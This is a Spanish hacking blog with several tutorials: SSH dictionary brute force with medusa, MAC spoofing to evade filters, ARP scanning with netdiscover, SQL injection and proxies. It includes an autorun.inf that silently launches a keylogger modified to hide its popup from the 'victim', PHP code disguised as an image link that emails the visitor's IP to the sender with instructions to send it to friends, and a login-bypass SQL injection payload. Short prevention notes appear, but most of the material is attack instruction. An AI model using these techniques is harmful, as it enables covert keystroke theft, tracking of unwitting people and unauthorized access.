Un ataque muy común que se hace uso de dichas ‘vulnerabilidades’ son los ‘ataques basados en diccionarios’ (dictionary-based attack). El ataque consiste en bombardear al servidor con nombres de usuarios y contraseñas aleatorios. Es algo parecido a intentar abrir una caja fuerte introduciendo números al azar. Si alguna vez te has encargado de algún servidor ssh o ftp seguramente los hayas sufrido.

Ya que el número de posibles combinaciones de usuarios y passwords posibles es demasiado alto, en este tipo de ataque normalmente se usan diccionarios. Un diccionario (de passwords y/o usuarios) es un fichero de texto con nombres de usuario y passwords frecuentemente usados. Por ejemplo, en la mayor parte de sistemas nos solemos encontrar un usuario ‘root‘, y, estadísticamente hablando, passwords como ‘1234‘ o ‘qwerty‘ son usadas mas frecuentemente que ‘a\/gW1~3|23‘. Como te podrás imaginar, para diferentes idiomas se usan diferentes diccionarios.

Pero entonces…? SI!, La única manera de que este ataque funcione es que la combinación usuario-password este en tu diccionario, o en otras palabras, una mala gestión de usuarios/passwords.

El motivo por el que este tipo de ataques están tan extendidos es porque con un simple script podemos testear cientos o miles de servidores de forma automática sin necesidad de intervenir en el proceso. Otro motivo es que los ‘chicos malos’ necesitan ordenadores desde los que realizar sus ataques.

En un ataque real conseguir acceso al sistema es solo el primer paso. Una vez dentro se suele instalar como mínimo algún troyano con el cual garantizar el acceso en caso de que se cambie la password. Hay ocasiones en el que el atacante simplemente cambia la password para levantar sospecha y darle a conocer al usuario que su password es débil.

En este video tutorial os muestro un ejemplo práctico de cómo realizar este tipo de ataques y por supuesto como detectar su presencia.

Detalles técnicos

  • La distro usada para realizar el ataque es Backtrack 2, versión Live.
  • Para escanear la red y localizar posibles víctimas se uso nmap.
  • Para el ataque en si utilizamos medusa (~# man medusa).
  • El diccionario usado pertenece a ‘john the ripper‘ (Incluido por defecto en Backtrack 2).
  • El servidor de ssh en la víctima es una instalación estándar de OpenSSH.

Ver video tutorial

Video Tutorial: Backtrack 2 | Remote brute force attack

Pulsa aquí o sobre la imagen para acceder al vídeo tutorial.

Detección y prevención

La mejor forma de detectar este y cualquier tipo de ataque es comprobando los logs y analizando cualquier anomalía. En su día escribí un post llamado ‘Navegando entre los logs’ donde hable de cómo el servidor en el que se encuentra alojado esta web, Fujiyama, estaba en constante estado de alerta.

En ‘Consejos básicos: Mantener un servidor del ssh’ menciono las practicas mas habituales para evitar este tipo de ataques sobre servidores de ssh. En esa época decidí cambiar el puerto de escucha del servidor de ssh y desde entonces no he recibido ningún ataque en los dos últimos meses.

Todo NIC (Network Interface Controller)

Todo NIC (Network Interface Controller) posee un identificador de 48 bits al que normalmente nos referimos como MAC. Dicho identificador es asignado por el fabricante de la tarjeta, y teoricamente es “único” para cada NIC, y . Dichos 48 bits se suelen representan en hexadecimal (16 grupos de 4 bits).

Como dato interesante, antes de poder asignar una MAC, los productores de Interfaces de red han de acordar (pagando una licencia) con el IEEE el rango de MACs en el que pueden trabajar. Gracias a esta jerarquía, analizando parte de la MAC podemos averiguar quien es el fabricante.

Normalmente el id del fabricante son los primeros 24 bits. Imaginemos que tu MAC es AA-AA-AA-BB-BB-BB, “AA-AA-AA” seria el código de fabricante y “BB-BB-BB” el numero asignado por dicho fabricante. Es por esto que muchas aplicaciones son capaces de “averiguar” el fabricante de la tarjeta (Compaq, intell, etc).

Ver MAC en Windows:

Windows trata a dicha dirección como “Physical Address” o dirección física. Para verla basta con que teclees en la consola del sistema “ipconfig /all”.

> ipconfig /all

Ethernet adapter Local Area Connection:

Sufijo de conexión específica DNS . :
Descripción . . . . . . . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet
Dirección física. . . . . . . . . . . . . : 00-E0-7E-11-22-33
DHCP habilitado. . . . . . . . . . . . . . . . : No
Dirección IP. . . . . . . . . . . . . . . . . . . . : 192.168.1.10
Máscara de subred. . . . . . . . . . . . . . : 255.255.0.0
Puerta de enlace predeterminada . : 192.168.1.1
Servidores DNS. . . . . . . . . . . . . . . . . :

Ver MAC en Linux:

Linux por otro lado la llama “Haddr”, Hardware address. Para verla basta con pulsar “sudo ifconfig” o en la terminal.

#sudo ifconfig

eth0 Link encap:Ethernet HWaddr 00:0B:DB:C6:2E:5C
inet addr:150.203.233.126 Bcast:150.203.233.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7002 errors:0 dropped:0 overruns:0 frame:0
TX packets:749 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:1861755 (1.7 MiB) TX bytes:141647 (138.3 KiB)
Base address:0xdf40 Memory:feae0000-feb00000

“universally administered address” vslocally administered address”

Entonces…, es posible o no cambiar dicho identificador?. En linux Si. En windows normalmente tambien, aunque depende de los drivers.

Hasta ahora implicitamente nos estabamos refiriendo a la “universally administered address”. Dicho código esta grabado “Hard Coded” en la tarjeta y como proras imaginar NO se puede modificar. Sin embargo, con el fin de dar cierta flexibilidad a los administradores de redes se decidió crear la llamada “locally administered address“ la cual se mantiene via software, y SI que la podemos personalizar.

En el momento que asignemos algún valor a la segunda, la tarjeta comenzará a usar dicho valor. Este truco es muy útil para evitar filtros de MAC o suplantar otros equipos.

Cambiar la MAC en Windows:

Inicio -> Panel del Control -> Conexiones de red -> Conexión de red local -> (botón derecho) propiedades:

MAC1

-> Configuracion -> (Pestana)Avanzado:

MAC2

-> Selecciona “Locally Administered Address” e introduce la nueva MAC -> Aceptar -> Aceptar.

Cambiar la MAC en Linux:

# sudo ifconfig eth0 hw ether AA:AA:AA:BB:BB:BB

Opciones:
eth0 -> Interfaz de la tarjeta que quieras cambiar.
AA:AA:AA:BB:BB:BB -> Nueva MAC.

Por ultimo, Aquí os dejo una lista (gracias a ettercap) bastante completa de los rangos asignados a los diferentes productores de tarjetas.

Netdiscover, analizando la red.

http://nixgeneration.com/~jaime/netdiscover/

Anoche saliste de fiesta, la ocasión se lo merecía, habías construido tu primer USB-KeyLogger. Desgraciadamente, se te fue un poco la mano con el alcohol y hoy te levantas en un lugar en el que nunca antes habías estado… Seguramente, lo primero que harás una vez levantado es mirar a tu alrededor y observar el entorno. Buscar elementos que te resulten familiares que te sirvan para hacerte una idea de donde estas y contra que es lo que te enfrentas.

No!, no me he vuelto loco. Sin embargo la situación es similar a cuando conectas tu ordenador a una red desconocida (ya sea por cable o Wireless). Inicialmente, si tienes suerte, habrá un servidor de DHCP que te proveerá de la mínima información necesaria para poder hacer uso de la red; una ip, una mascara de red y una puerta de enlace. Sin embargo nosotros queremos saber un poco mas sobre los aquello que nos rodea. Porque?, imagínate por ejemplo que alguien esta haciendo un mitm (man in the middle attack) con ettercap

Pues bien, hoy os presento netdiscover. Haciendo uso del ARP (Address resolution protocol), Netdiscover localizará todos los equipos de la red devolviéndonos una relación entra la ip local y la MAC de cada equipo.

Los que creyeseis (yo mismo hace una semana) que con broadcast un ping (ICMP echo request) es suficiente estáis equivocados. En muchas ocasiones os encontrareis que la función ping esta deshabilitada (por motivos de seguridad).

Esta es la pagina oficial de netdiscover. También es posible que os podáis hacer con el a través de alguno de los repositorios de tu distro.

Una vez instalado es bueno leerse el manual (man netdiscover). A groso modo estas son algunas de las opciones disponibles

Opciones Principales:

-i dispositivo: interfaz de red que quieres usar; eth0, eth1, wlan.

-r rango: rango que de deseas escanear. Ex: 192.168.1.0/24 escaneara todas las ips entre 192.168.1.0 y 192.168.1.255.

-p: modo pasivo. No infectará nada, solo escucha las peticiones ARP que lleguen a nuestro equipo (eficaz pero mas lento).

-s time: tiempo en milisegundos entre peticiones ARP. Útil si no quieres saturar la red o no quieres ser detectado por algún IDS.

-f: fast mode.

Ejemplos de Uso:

  • Búsqueda de direcciones comunes en eth0

# netdiscover -i eth0

  • Búsqueda en modo rápido de direcciones comunes en eth0 (solo la puerta de enlace)

# netdiscover -i eth0 -f

  • Ejemplo de análisis de algunos rangos

# netdiscover -i eth0 172.26.0.0/24
# netdiscover -i eth0 192.168.0.0/16
# netdiscover -i eth0 10.0.0.0/8

  • Idem que el primer ejemplo pero con un intervalo de 0.5ms (1ms por defecto)

# netdiscover -i eth0 -s 0.5

  • Búsqueda pasiva. Solo analiza el trafico entrante. No infectará nada a la red.

# netdiscover -i eth0 -p

Conclusion:

Personalmente estoy encantado con esta sencilla aplicacion. Obviamente netdiscover no tiene la potencia de otras aplicaciones como nmap, pero sin embargo “lo que hace lo hace bien” de una manera rápida y sencilla. Puede resultar muy útil en las primeras etapas del análisis de una red.

Tutorial: USB KeyLogger

Hoy nos olvidamos de cables, backdoors, ARP Poisoning, ettercap, sniffers y todo aquello que tenga que ver con redes.

Mucha gente cree que con proteger su equipo contra ataques atraves de la red con firewalls y antiviruses, el ordenador ya es seguro e impenetrable. Sin embargo, ¿que pasa cuando el atacante tiene acceso físico a la maquina? ¿Es realmente peligroso?

Para demostrar el potencial de este tipo de ataques, hoy vamos a crear nuestro propio USB-Keylogger. Un “pendrive” que al conectarlo a nuestro querido Windows, guardara todo aquello que tecleemos sin que, por supuesto el usuario “victima” se entere.

Bueno…, miento, en realidad este metodo tiene truco, ya que para hacerlo funcionar windows tiene que tener habilitada el mecanismo de autoarranque. Es decir, cuando insertemos el pendrive, windows debera ejecutar el archivo autorun.inf. Sin embargo, por lo general no es problema ya que windows tiene dicha opcion activada por defecto.

Requisitos:

  1. Maquina con Windows (probado en XP SP2)
  2. Un Pendrive (de con al menos 15 MB)

Instalación:

  1. Descárgate este archivo y descomprímelo en el directorio raíz del Pendrive.

Ataque:

  1. Conectar el USB a la maquina.
  2. Seleccionar la primera opción en el menú de Auto arranque “Iniciar Keylogger”.
  3. Una vez arrancado el Keylogger pulsa F12 para acceder al los menus (opcional).

Al pulsar “Aceptar” veras que hay un nuevo proceso llamado keylogger.exe, este es el encargado de registrar todas las teclas pulsaciones realizadas sobre el teclado.

Acceso a los Logs:

  1. Los logs se irán almacenando en la carpeta “logdir”.
  2. Usa tu editor de texto favorito para acceder a ellos.

Como Funciona:

Cuando conectamos un medio extraíble a nuestro sistema (CDs, DVDs, Pendrives, etc), Windows nos permite incluir un archivo “Autorun.inf” en el que podemos definir el comportamiento del medio, ex;dar nombre a la unidad, asignarle iconos especiales o lanzar aplicaciones. Asi es como Juegos, CDs de Música e Instaladores nos sorprenden con sus encantadores menús cada vez que los insertamos en el ordenador.

Desde Autorun.inf podemos ejecutar cualquier aplicación, lo único que debemos de conocer es su ubicación, en este ejemplo un keylogger, pero perfectamente podría ser reemplazado por un ladrón de passwords, virus, troyanos, o lo que se nos ocurra.

En este ejemplo solo usaremos los comandos mas basico:

label: Asigna el nombre de la unidad.
icon: ubicacion del icono que se asignara a la unidad.
action: Texto que se mostrara como opcion por defecto en el menu de autoarranque.
shellexecute: Aplicacion que ejecutar.

Autorun.inf

[Autorun]
label=Icaix.com
icon=”icaix.ico”
action=Iniciar Keylogger
shellexecute= “Keylogger.exe”

Keylogger

El keylogger usado se llama PyKeylogger. Esta es la pagina oficial. Os recomiendo que le echéis un ojo, es open source con licencia GPL.
El binario del ejemplo no es exactamente el de la página oficial. Para eliminar el pop up inicial y hacer el ataque más real he modificado la línea 114 del archivo “keylogger.pyw”. Aquí una copia.

Prevención:

La forma de evitar este tipo de ataques es deshabilitar la opcion de autoarranque de windows. Aquí os dejo un link de cómo hacerlo.

Como obtener la Ip de nuestros amigos del msn

Seguramente alguna vez se has necesitado/querido tener acceso a las ip de algunos de tus contactos de Messenger. Hasta ahora, la única manera que, por lo menos yo, conocia para obtenerla era mandándoles un archivo y capturar la ip durante la transmisión. Aunque dicho método funciona, no es demasiado práctico.

Hoy navegando por Internet me he cruzado con Profit42.com. Profit42.com es una especie de blog/comunidad donde entre otros temas hablan de cosas de seguridad y tienen colgados unos cuantos tutoriales. Uno de ellos es sobre el que voy a hablar ahora (Fuente original).

El objetivo consiste en que la victima pulse sobre un link, aparentemente inofensivo, que automáticamente nos mandara un email su ip. Realmente, dicho link no es mas que una pequeña pagina en php, que automáticamente envía un mail con la ip de todo aquel que acceda a el. El unico requesito es tener acceso a un dominio con soporte para php.

Ejemplo:

Creemos una carpeta llamada foto.jpg
En dicha carpeta guardaremos una imagen (http://LoQueSea.com/foto.jpg/foto.jpg) y crearemos un documento “index.php” (http://LoQueSea.com/foto.jpg/index.php) con el siguiente codigo:

$remote_addr = getenv(’REMOTE_ADDR’);
$toaddress = “tuMail@mail.com”; // tu email!
$subject = “Asunto”; // asunto del email
$message = ” IP: $remote_addr”; // Cuerpo del mail
$fromname = “CapturaIp”; // Quien lo envía
$fromaddress = “loQueTeDeLaGana@LoQueSea.com”; // Email de quien lo envía
$headers = “MIME-Version: 1.0\n”;
$headers .= “Content-type: text/plain; charset=iso-8859-1\n”;
$headers .= “X-Priority: 3\n”;
$headers .= “X-MSMail-Priority: Normal\n”;
$headers .= “X-Mailer: php\n”;
$headers .= “From: \”".$fromname.”\” <”.$fromaddress.”>\n”;
mail($toaddress, $subject, $message, $headers);
?>

Cuando alguien acceda a Index.php:

  1. Mandara la ip a tuMail@mail.com
  2. Mostrara foto.jpg

Aqui un ejemplo del resultado: http://icaix.com/gracioso.jpg
Descargatelo desde Aqui

Como ejecutar el ataque?

Simplemente mándales a tus amigos un link a http://dominoConSoportePhp.com/foto.jpg y listo, recibirás un mail segundos mas tarde con su ip.

SQL injection”

Supongo que la mayoría de vosotros conocereis lo que un “SQL injection attack” es. Para los que no, “SQL injection” consiste en la inserción código SQL en las variables del programa que estés ejecutando. Si tienes suerte, el programa insertara dichas variables dentro de la “query” y podremos realizar el ataque.

Por ejemplo, imaginémonos el tipo formulario de acceso a un sistema. Este tiene dos campos, cuyas variables son “$nombreUsuario” y “$password”.

Una forma de comprobar si dicho usuario existe seria con la siguiente “query”

SELECT *
FROM tablaUsuarios
WHERE (userId = ‘$nombreUsuario’) AND (pass = ‘$password’);

Donde:

  • tablaUsuarios -> tabla que contiene los usuarios
  • userId -> campo de la tabla que contiene los nombre de usario
  • pass -> campo de la tabla que contiene las passwords.

Si la query devuelve algún resultado entonces le damos acceso al usuario.
Bien, imaginémonos que como nombre de usuario introdujésemos lo siguiente;

  • $nombreUsuario = pepito’ OR ‘x’=’x
  • $password = nose’ OR ‘y’=’y

La query resultante seria la siguiente:

SELECT *
FROM tablaUsuarios
WHERE (userId = ‘pepito’ OR ‘x’=’x’) AND (pass = ‘nose’ OR ‘y’=’y’);

Como veis, la cláusula WHERE será siempre cierta y por tanto es muy probable que consigamos acceso al sistema (seguramente con el primer miembro de la lista).

La verdad es que es una pena que rara vez se hable del tema en entornos educativos, ya que existen formas de evitar dichas vulnerabilidades, y un correcto acceso a la información es básico. Muchas son las empresas que han sufrido de dichos ataques, y aun así, poco lo que se esta haciendo para advertir a las futuras generaciones de ingenieros y programadores.

No voy a entrar en mayor detalle en este tema ya que esta extensamente documentado en la red y con google podréis encontrar cientos de ejemplos, así como de soluciones o guías de prevención para evitar posibles ataques.

Sin embargo un video que si que os recomiendo ver es este.

TUTORIAL: Proxies

TUTORIAL: Proxies

by Miggs

Introduccion

Recientemente, un amigo que esta muy Jodido (Fucked), me pidió que le explicara que son eso de los “proxies”, para que sirven, y como se usan. Así que bueno, en este tutorial intento explicar de una manera simple que es eso de los proxies. En particular voy a centrarme en HTTP Proxies ya que estos son los mas extendidos. Hoy no, pero a lo mejor en algun futuro cercano explicare como configurar SQUID.

Este tutorial esta basado en el uso proxies públicos. En el caso de que desconozcas a los admins de dichos proxies, por favor, tener cuidado!:
UN PROXY PUEDE FILTRAR Y ANALIZAR TODO EL TRAFICO QUE PASE ATRAVES DE EL. Por eso, no recomiendo que introduzcáis passwords ni información delicada mientras los uséis.

Que es un HTTP Proxy?

Un HTTP proxy no es mas un servidor que se interpone entre todas las conexiones HTTP (puerto 80 por defecto) tuyas y cualquier otro servidor. Es decir, si quieres conectarte a icaix.com desde tu casa. Tu ordenador se conectara primero al proxy, y sera el proxy el que posteriormente se conecte a icaix.com, canalizando todo el tráfico entre tu ordenador e icaix de una forma transparente para ti.

Tipos de HTTP_Proxy!

Bien, antes de seguir es importante que diferenciemos los diferentes tipos de HTTP proxies que nos podemos encontrar, ya que segun el tipo de proxy que usemos estaremos mandando mas o menos datos a los servidores a los que nos conectemos. NO todos los proxys mantienen la anoimidad del cliente, así que es importante saber que es lo que pueden llegar a saber de nosotros.

  • Proxy transparente: Como su nombre indica, es transparente, es decir, el proxy comunica al servidor que efectivamente se esta usando un proxy, pero…, inmediatamente después le da a conocer la ip del cliente. El uso de este tipo de proxies es canalizar el trafico de múltiples estaciones, con el fin de analizar el trafico, y posiblemente bloquear determinadas ips (ex: youTube.com), o limitar en ancho de banda de las estaciones.
  • Proxy Anónimo: Indican a los servidores que se esta usando un proxy, pero no le da a conocer la ip del cliente.
  • High anonymity: Proxy: Este es el que mas me gusta, y el que mas util si quieres esconder tu ip. El proxy se encarga como su nombre indica de proteger tu anonimidad. El proxy se conecta al servidor en cuestión haciéndole creer que el es el cliente. NO avisa que se este usando un proxy.

Existen otros tipos de HTTP Proxies, pero son poco utilizados así que ignoraremos su existencia (por ahora).

Porque “HTTP Proxy” y no “Proxy” a secas?

Como seguramente seras capaz de intuir, los HTTP proxies solo trabajan con conexiones HTTP.

Porque HTTP exclusivamente y no cualquier servicio como FTP, TELNET?.

HTTP es un Protocolo. Por tanto que el servidor Proxy tiene que ser capaz de trabajar con los campos de las tramas que le enviamos. Si en algún caso le enviásemos tramas de cualquier otro protocolo, por ejemplo TELNET, el servidor no las entenderá y las ignorara.

Entonces…, Porque mi cliente de FTP tiene la opción de usar el dichoso Proxy?

Lo que esta pasando ahí, es que el cliente de FTP esta encapsulando las tramas FTP dentro de paquetes HTTP. El PROXY que es muy listo desencapsulara y enviara al servidor de ftp tramas en formato FTP.Ojo, no todos los proxies soportan este tipo de servicio.

Vale, Vale, cállate ya, me mola!, como se usan?!

La configuración de proxies normalmente se especifica a nivel de aplicación. Normalmente, en principio no afecta al entorno de red del del OS, funcionando de forma independiente en cada una de las aplicaciones. Es decir, puedes tener firefox configurado para que use determinado proxy, mientras que Opera, o el msn usen otro o ninguno. Hoy os voy a enseñar como configurarlo en ambos, Firefox, e IE.

Como bien he dicho arriba Normalmente no afecta al variables de red del OS, sin embargo, los chicos de Microsoft decidieron implementar IE de tal forma que en vez de tener sus propios parámetros como hacen Firefox o Opera, IE hará uso de las variables del sistema, es decir, al configurar un proxy en IE estaremos actualizando el entorno de red de Windows, extendiendo el uso de dicho proxy al resto de aplicaciones que utilicen en este caso HTTP.

Lo primero es conseguir un proxy. En internet hay paginas que se dedican unica y exclusivamente a publicar direcciones de Proxies publicos. Si no tienes un poxy a mano, y no te apetece montarte uno en tu propio ordenador, esta es la mejor solución. La pagina mas completa que conozco es: http://www.publicproxyservers.com/ Ahí encontrareis multitud de proxies (aunque muchos de ellos no funcionan).

Una vez encontréis un proxy que os guste, notareis que hay varios parámetros dentro de cada proxy. Los mas importantes son la ip y el puerto de escucha ( y el tipo de proxy por supuesto):

IP: es la ip única que identifica al servidor, y es con lo que localizamos el servidor

Puerto: es el puerto de escucha dentro del servidor. Por ejemplo los puertos 3128 y 8080 son los que usan la mayor parte de los proxies. EL PUERTO DE ESCUCHA NO TIENE PORQUE SER 80!!!!. El puerto 80 es normalmente usado para servidores Web HTTP (ex: Apache o IIS), lo cual es un servicio completamente diferente al de un proxy. Los proxies normalmente escuchan en otros puertos. Es mas…, mi consejo es evitar los proxies que escuchen por el puerto 80 ya que lo mas seguro es que se dediquen a analizar trafico.

Tipo de proxy: explicado mas arriba.

En este ejemplo usaremos el siguiente proxy ficticio:

Configuración en Firefox 1.5

Configuración en IE 6:

INSISTO: La configuración de IE modifica los parámetros de conexiones de red del sistema. Cualquier aplicación que haga uso de dichos parámetros usara dicho proxy.

Como comprobar que efectivamente estoy a través de un proxy?

Lo mas sencillo es comprobar a través de www.showmyip.com tu ip antes y después de configurar el proxy.

Como deshabilito el proxy?

Muy sencillo, lo único que tienes que hacer es deshabilitar la opción de uso de proxy y tu trafico recuperara la ruta por defecto (conexión directa a Internet). La nueva configuración se aplicara a todas las conexiones creadas a partir de dicho momento.

Vale, quiero saber mas! Donde sigo….

Mi recomendacion para profundizar en el tema es google por supuesto. Hay multitud de proxies open source con los que poder jugar. Mi favorito (el que uso) es Squid.

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter